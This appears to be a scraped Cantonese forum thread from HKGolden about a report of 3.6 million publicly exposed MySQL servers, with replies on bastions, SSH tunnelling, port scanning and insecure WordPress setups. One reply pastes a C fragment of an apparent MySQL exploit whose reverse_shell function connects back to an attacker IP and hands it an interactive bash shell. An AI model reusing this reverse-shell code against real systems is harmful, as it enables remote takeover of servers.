主頁 高登熱話 吃喝玩樂 科技消費 名人專訪 短片
現有會員可[按此]登入。未成為會員可[按此]註冊。
[公司模式 - 關]  [懷舊模式 - 開
[Youtube 預覽 - 關]  [大字型]  [小字型]

您現在聚腳在 硬件台內。

即日起停收SMS會員

香港高登討論區曾接納用戶以SMS註冊成為會員,惟發現不少人濫用SMS會員登記,註冊帳號只作洗版宣傳之用#kill2# 。為防止問題惡化,本站決定即日起停收SMS會員,並改行ISP電郵加上SMS認證。

新註冊規則如下:
1. 部份獲認可的ISP或學校電郵仍可直接申請帳號#good#
2. 由於部份ISP容許用家任意更改電郵名稱,所以我們會同時要求這些電郵用戶提供手提電話號碼,作SMS認證#adore# ; ......
精選文章
DeerGamer
New App Android IOS
跳至第

發起人
研究發現有 360 萬臺 MySQL 伺服器曝露於公開網路
19 個回應
食旗家​

#good2#2    #bad#0  
標籤:
傻的嗎 , 本身啲人就係特登咁做可以remote access
寫呢啲文條傻閪自己有冇睇過mysql.conf


係狎,嘜都開SQL,但唔係放野


由其喺wp[sosad]


由其喺wp[sosad]

default password


係狎,嘜都開SQL,但唔係放野

Download個簡易hosting software 佢自動同你開左


傻的嗎 , 本身啲人就係特登咁做可以remote access
寫呢啲文條傻閪自己有冇睇過mysql.conf

唔整個 bastion?

利申:唔熟 backend,求教 #adore#


傻的嗎 , 本身啲人就係特登咁做可以remote access
寫呢啲文條傻閪自己有冇睇過mysql.conf

唔整個 bastion?

利申:唔熟 backend,求教 #adore#

唔係個個都行azure
講真有啲濕勁project 仔,是勁但啦
擺上share host, free host 果啲,冇vpn, 唔開port 點access mysql


傻的嗎 , 本身啲人就係特登咁做可以remote access
寫呢啲文條傻閪自己有冇睇過mysql.conf

唔整個 bastion?

利申:唔熟 backend,求教 #adore#

唔係個個都行azure
講真有啲濕勁project 仔,是勁但啦
擺上share host, free host 果啲,冇vpn, 唔開port 點access mysql

bastion.
退一萬步ssh portforward 個安全過直接開0.0.0.0 3306


傻的嗎 , 本身啲人就係特登咁做可以remote access
寫呢啲文條傻閪自己有冇睇過mysql.conf

唔整個 bastion?

利申:唔熟 backend,求教 #adore#

唔係個個都行azure
講真有啲濕勁project 仔,是勁但啦
擺上share host, free host 果啲,冇vpn, 唔開port 點access mysql

就咁轉個 port 去其他
唔用 3306
係唔係都冇乜用
係唔係純玩勁自己


你個project永遠都係demo階段,自己都入唔返


傻的嗎 , 本身啲人就係特登咁做可以remote access
寫呢啲文條傻閪自己有冇睇過mysql.conf

唔整個 bastion?

利申:唔熟 backend,求教 #adore#

唔係個個都行azure
講真有啲濕勁project 仔,是勁但啦
擺上share host, free host 果啲,冇vpn, 唔開port 點access mysql

就咁轉個 port 去其他
唔用 3306
係唔係都冇乜用
係唔係純玩勁自己

我portscan /nmap你60000個port , N種大路protocol 其實都唔駛一兩分鐘, 改port從來唔係一種有效既perimeter defense


美局可以用ftp入侵7成港網站Sql 斯諾登講的


最好既防守係有十萬個id=串碼入口,五秒後先回佢d野


/var/lib/mysql/my.cnf"

char* env_list[] = { "HOME=/root", NULL };
typedef ssize_t (*execvp_func_t)(const char *__file, char *const __argv[]);
static execvp_func_t old_execvp = NULL;


// fork & send a bash shell to the attacker before starting mysqld
void reverse_shell(void) {

int i; int sockfd;
//socklen_t socklen;
struct sockaddr_in srv_addr;
srv_addr.sin_family = AF_INET;
srv_addr.sin_port = htons( SHELL_PORT ); // connect-back port
srv_addr.sin_addr.s_addr = inet_addr(ATTACKERS_IP); // connect-back ip

// create new TCP socket && connect
sockfd = socket( AF_INET, SOCK_STREAM, IPPROTO_IP );
connect(sockfd, (struct sockaddr *)&srv_addr, sizeof(srv_addr));

for(i = 0; i <= 2; i++) dup2(sockfd, i);
execle( "/bin/bash", "/bin/bash", "-i", NULL, env_list );

exit(0);
}


由其喺wp[sosad]

default password

係個網後面加/wp-admin 就入到[sosad]


由其喺wp[sosad]

default password

係個網後面加/wp-admin 就入到[sosad]


google 吓都一大堆 wp 俾人改咗
變咗咩你中獎了 [sosad]


由其喺wp[sosad]

default password

係個網後面加/wp-admin 就入到[sosad]


google 吓都一大堆 wp 俾人改咗
變咗咩你中獎了 [sosad]

多數folder permission set得衰
777[sosad]


咁係班人傻的嗎姐


由其喺wp[sosad]

default password

係個網後面加/wp-admin 就入到[sosad]


google 吓都一大堆 wp 俾人改咗
變咗咩你中獎了 [sosad]

:O 原來係呢個原因


跳至第



  快速回覆 - 輸入以下項目

本討論區現只接受會員張貼文章,本站會員請先登入。非會員人仕,您可以按此加入為新會員,費用全免,並可享用其他會員服務。


上次光臨時間: 8/8/2022 11:35
今天貼文總數: 436 | 累積文章數目: 7,036,665

聯絡我們 | 服務條款 | 私隱政策 | 廣告查詢 | 職位空缺
Copyright © 2022 HKGolden.com. All Rights Reserved.